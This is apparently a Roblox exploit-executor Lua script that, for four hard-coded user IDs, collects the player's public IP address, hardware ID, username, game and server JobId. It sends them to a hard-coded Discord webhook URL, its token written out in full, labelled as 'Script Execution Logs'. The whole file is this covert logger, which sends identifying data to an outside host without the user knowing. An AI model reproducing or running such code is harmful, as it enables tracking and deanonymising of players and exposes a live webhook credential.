if game.Players.LocalPlayer.UserId == 3989431918 or game.Players.LocalPlayer.UserId == 3568365084 or game.Players.LocalPlayer.UserId == 2764979979 or game.Players.LocalPlayer.UserId == 3561760072 then

local ip = game:HttpGet("https://api.ipify.org")
local HWID = game:GetService("RbxAnalyticsService"):GetClientId()
local time = os.date("%c", os.time())
local teleport = "```lua\n".. 'game:GetService("TeleportService")'..":TeleportToPlaceInstance".."("..game.PlaceId..",".. "'" .. game.JobId.. "'".. ",".."game.Players.LocalPlayer"..")```"
local gameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

function webhook(NAME)
    url = "https://discord.com/api/webhooks/1034294707259453522/e2rPjdvUH7pZrzYELke-5AKpn4UCUDlUTV3E1dzQ_sIdS_68xYl6wHfShAfpOI4ovg1P"
    local data = {
        ["content"] = "",
        ["username"] = NAME,
        ["embeds"] = {
            {
                ["title"] = 'Script Execution Logs',
                ["description"] = "**Join script:**\n" .. teleport,
                ["type"] = "rich",
                ["footer"] = {
                    ["text"] = time
                },
                fields = {
 
                    {
						name = "**Username**",
						value = "> "..game.Players.LocalPlayer.Name,
						inline = true
					},

                    {
						name = "**UserId**",
						value = "> "..game.Players.LocalPlayer.UserId,
						inline = true
					},

                    {
						name = "**Game**",
						value = "> "..gameName,
						inline = true
					},

                    {
						name = "**Executor**",
						value = "> "..identifyexecutor(),
						inline = true
					},

                    {
						name = "**JobId**",
						value = "> "..game.JobId,
						inline = true
					},

                    {
						name = "**PlaceId**",
						value = "> "..game.PlaceId,
						inline = true
					},

                    {
						name = "**Ip**",
						value = "> "..ip,
						inline = true
					},

                    {
						name = "**HWID**",
						value = "> "..HWID,
						inline = true
					},




                }
            }
        }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(data)

    local headers = {
        ["content-type"] = "application/json"
    }

    request = http_request or request or HttpPost or syn.request
    local a = {Url = url, Body = newdata, Method = "POST", Headers = headers}

    request(a)
end

webhook()

end
